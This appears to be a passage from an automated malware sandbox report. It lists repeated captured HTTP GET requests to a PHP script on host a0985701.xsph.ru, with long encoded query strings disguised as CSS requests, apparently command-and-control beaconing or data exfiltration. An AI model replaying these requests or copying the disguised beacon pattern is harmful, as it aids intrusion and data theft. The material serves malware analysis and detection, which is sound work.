ETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy&7545dfb3365e5b9fe53ef5879182e1a7=0df81b81d71e3e7c3a0591c145dca1b2&64f08b8004af955eddd13c6a6e9c8200=QNzATY3I2NxImYzQDM4EDMihjY4ImNmJWYwAzYwQmZmV2MxcDNhBDN&JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&b23843f8eb998a6848c0ef54cab04792=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
